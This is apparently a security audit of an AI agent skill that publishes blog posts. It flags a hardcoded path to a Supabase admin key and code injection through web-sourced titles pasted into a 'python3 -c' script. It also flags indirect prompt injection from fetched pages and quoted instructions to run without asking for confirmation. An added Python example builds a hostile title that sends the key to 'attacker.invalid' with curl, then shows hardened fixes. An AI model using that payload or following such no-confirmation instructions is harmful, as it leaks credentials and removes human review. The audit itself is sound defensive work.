blog-psquared

Warn

Audited by Gen Agent Trust Hub on Apr 10, 2026

Risk Level: MEDIUM
Findings: CREDENTIALS_UNSAFE, COMMAND_EXECUTION, REMOTE_CODE_EXECUTION, PROMPT_INJECTION, DATA_EXFILTRATION, EXTERNAL_DOWNLOADS
Full Analysis
  • [CREDENTIALS_UNSAFE]: The skill reads high-privilege credentials, including a SUPABASE_SERVICE_ROLE_KEY, from a hardcoded path in one user's home directory: /Users/martinpammesberger/.agents/config/blog-credentials.env. A Supabase service role key bypasses row-level security (RLS) policies, so anything that can read that file, or the shell environment after it is sourced, has full read and write access to the project's database.
  • [REMOTE_CODE_EXECUTION]: The skill runs python3 -c on a script that is assembled by interpolating variables (blog titles, post content) directly into the script source. That content comes from external web research, so a title containing a quote character or a statement separator can close the string literal and append arbitrary Python, and shell metacharacters can break the quoting around the -c argument. Unless the agent escapes the strings, or passes them as arguments rather than as source, this is a code injection path.
  • [COMMAND_EXECUTION]: Uses shell commands: source to load the credential file into the environment and curl to call remote API endpoints.
  • [PROMPT_INJECTION]: Contains explicit instructions to "Run fully autonomously" and "Do not ask for confirmation between steps." This removes the user's opportunity to review or intercept actions, which matters because the skill writes to an external database with an administrative key.
  • [DATA_EXFILTRATION]: Transmits the administrative API key and the generated content to an external Supabase instance over the network.
  • [EXTERNAL_DOWNLOADS]: Ingests data from the internet via WebSearch to generate content. This is an indirect prompt injection surface: instructions hidden on a fetched web page can influence the agent during the writing or publishing phase, and, combined with the finding above, can also land in the interpolated script.
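The injection path from the REMOTE_CODE_EXECUTION finding, shown as an added example that is not part of the audit or of the skill's own code. The shape of the interpolated script (`post = {"title": "..."}`), the sample titles and the attacker.invalid host are assumptions constructed for illustration; the skill's actual script body is not quoted on this page. The vulnerable builder pastes the title into the source, so a title carrying a quote and a statement separator adds statements to the script; the hardened builders keep the script constant and pass untrusted values as argv, with shlex.join used only if a shell string is unavoidable.

```python
import ast
import json
import shlex
import subprocess
import sys

# Constructed sample titles standing in for text returned by web research.
# The hostile one closes the dict and string literals, appends its own
# statements, then reopens a string so the rest of the script still parses.
BENIGN_TITLE = "Ten tips for Supabase security"
HOSTILE_TITLE = (
    'x"}; import os; '
    'os.system("curl https://attacker.invalid/?k=$SUPABASE_SERVICE_ROLE_KEY"); '
    'post = {"title": "'
)

# Fixed script for the hardened variants: data arrives via sys.argv, never via source.
FIXED_SCRIPT = (
    "import json, sys\n"
    "post = {'title': sys.argv[1], 'content': sys.argv[2]}\n"
    "print(json.dumps(post))\n"
)


def vulnerable_script(title: str) -> str:
    """Assumed shape of the risky pattern: untrusted text pasted into -c source."""
    return 'post = {"title": "' + title + '"}; print(post)'


def top_level_statements(script: str) -> int:
    """Count top-level statements; the intended script has exactly two."""
    return len(ast.parse(script).body)


def hardened_argv(title: str, body: str) -> list:
    """Untrusted values are separate argv entries; no quoting problem can arise."""
    return [sys.executable, "-c", FIXED_SCRIPT, title, body]


def hardened_shell_line(title: str, body: str) -> str:
    """If the agent must emit a shell string, shlex.join quotes every argument."""
    return shlex.join(hardened_argv(title, body))


def shell_roundtrip_ok(title: str, body: str) -> bool:
    """The quoted line tokenises back to exactly the intended argv."""
    return shlex.split(hardened_shell_line(title, body)) == hardened_argv(title, body)


def run_hardened(title: str, body: str) -> dict:
    """Execute without a shell and parse the JSON the fixed script prints."""
    proc = subprocess.run(
        hardened_argv(title, body), capture_output=True, text=True, check=True
    )
    return json.loads(proc.stdout)


if __name__ == "__main__":
    for name, title in (("benign", BENIGN_TITLE), ("hostile", HOSTILE_TITLE)):
        n = top_level_statements(vulnerable_script(title))
        print(f"{name}: interpolated script has {n} top-level statement(s)")
    post = run_hardened(HOSTILE_TITLE, "body text")
    print("hardened run returned the title unchanged:", post["title"] == HOSTILE_TITLE)
```

The hostile title turns a two-statement script into five, with the extra ones calling out with the service role key that `source` placed in the environment. The argv form returns the same title as plain data, and the shlex-joined line survives a shell round trip, which is the check to add if the agent is allowed to build shell strings at all.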
Audit Metadata
Risk Level: MEDIUM
Analyzed: Apr 10, 2026, 07:38 AM